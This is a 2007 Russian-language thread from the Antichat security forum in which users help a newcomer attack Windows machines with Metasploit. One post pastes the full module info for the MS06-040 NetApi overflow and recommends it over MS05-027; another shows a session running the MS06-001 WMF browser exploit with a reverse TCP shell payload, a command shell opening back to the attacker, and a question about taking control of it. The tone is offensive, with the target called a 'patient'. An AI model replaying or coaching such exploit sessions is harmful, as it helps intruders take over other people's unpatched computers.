HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 26.01.2007, 01:53
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


Talking

Цитата:
Сообщение от karabym  
Да я фиг знает где че )) лень сильная штука
Поиск рулит:
http://forum.antichat.ru/search.php?searchid=655706

оффтоп: Один лентяй другому помагает...
 
Ответить с цитированием

  #22  
Старый 26.01.2007, 01:57
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию

Цитата:
Один лентяй другому помагает...
отжег так второй вобще получается тунеядец

Последний раз редактировалось karabym; 26.01.2007 в 01:59..
 
Ответить с цитированием

  #23  
Старый 29.01.2007, 23:12
Angel_MakKedo
Новичок
Регистрация: 25.01.2007
Сообщений: 5
Провел на форуме:
21878

Репутация: 0
По умолчанию

Большо спасибо кому не в лом черкнуть пару строк
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
 
Ответить с цитированием

  #24  
Старый 30.01.2007, 00:16
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Цитата:
Сообщение от Angel_MakKedo  
Большо спасибо кому не в лом черкнуть пару строк
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
ИМХО нет, но и его пробиваемость низка на новых системах:
Цитата:
Уязвимость Server Message Block (MS05-027) хотя и может позволить злоумышленнику проникнуть в ПК, атакующий должен пройти аутентификацию в системе. Эта уязвимость проявляется в Windows XP Service Packs 1 и 2, Windows 2000 Service Packs 3 и 4 и других версиях Windows
тогда уж юзай этот:
Цитата:
msf exploit(ms06_040_netapi) > info

Name: Microsoft Server Service NetpwPathCanonicalize Overflow
Version: 3720
Platform: Windows
Privileged: Yes
License: Metasploit Framework License v1.0

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id Name
-- ----
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
1 (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
2 (wcscpy) Windows XP SP0/SP1
3 (stack) Windows XP SP1 English
4 (stack) Windows XP SP1 Italian

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no proxy chain
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBDOM WORKGROUP no The Windows domain to use for authentication
SMBDirect True yes The target port is a raw SMB service (not NetBIOS)
SMBNAME *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPASS no The password for the specified username
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
SMBUSER no The username to authenticate as
SSL no Use SSL

Payload information:
Space: 370
Avoid: 7 characters

Description:
This module exploits a stack overflow in the NetApi32
CanonicalizePathName() function using the NetpwPathCanonicalize RPC
call in the Server Service. It is likely that other RPC calls could
be used to exploit this service. This exploit will result in a
denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed
exploit attempt will likely result in a complete reboot on Windows
2000 and the termination of all SMB-related services on Windows XP.
The default target for this exploit should succeed on Windows NT
4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

References:
http://www.securityfocus.com/bid/19409
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3439
http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx

msf exploit(ms06_040_netapi) >
P.S. Ксати ББ ms05-027 ИМХО уже заменён на ms06-035

Последний раз редактировалось -=lebed=-; 30.01.2007 в 00:23..
 
Ответить с цитированием

  #25  
Старый 30.01.2007, 00:55
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

only true hэcker can compile zero sploent.
 
Ответить с цитированием

  #26  
Старый 01.02.2007, 21:49
Angel_MakKedo
Новичок
Регистрация: 25.01.2007
Сообщений: 5
Провел на форуме:
21878

Репутация: 0
По умолчанию

quote:


msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
# Started reverse handler
# Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
# Server started.
# Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
# Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
msf exploit(ms06_001_wmf_setabortproc) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc


Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN Уязвимости Mail-сервис 32 08.04.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ